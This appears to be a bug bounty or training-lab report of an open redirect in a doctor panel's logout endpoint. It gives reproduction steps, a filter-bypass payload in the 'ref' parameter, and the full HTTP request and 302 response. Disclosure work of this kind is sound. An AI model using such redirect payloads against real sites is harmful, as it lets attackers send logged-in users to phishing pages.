Summary

There's an Open URL Redirect vulnerability in the logout functionality. If a malicious actor sends the link to the logged in doctor, the application will redirect the doctor to a malicious site.

Steps to Reproduce

1. As a logged in Doctor, click on the securely sign out button.
2. Notice the endpoint has a ref variable.
3. If you submit the following payload, the application will redirect the user to the url provided by the payload: ref=//https:\/\/www.google.com

GET /drpanel/logout.php?ref=//https:\/\/www.google.com HTTP/1.1
Host: firstbloodhackers.com:49250
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://firstbloodhackers.com:49250/drpanel/index.php
Cookie: drps=5d7d4cc8df1274aac3ef42507
Upgrade-Insecure-Requests: 1

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 09 May 2021 16:44:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://www.google.com
Content-Length: 0

As you can notice, the location header has the google.com url in it, which will take the user to that url.

Impact

Since the application does not has a mechanism to validate that the logged in user wants to log out, if the Doctor visits the URL provided by the attacker, it will redirect him/her to the malicious site.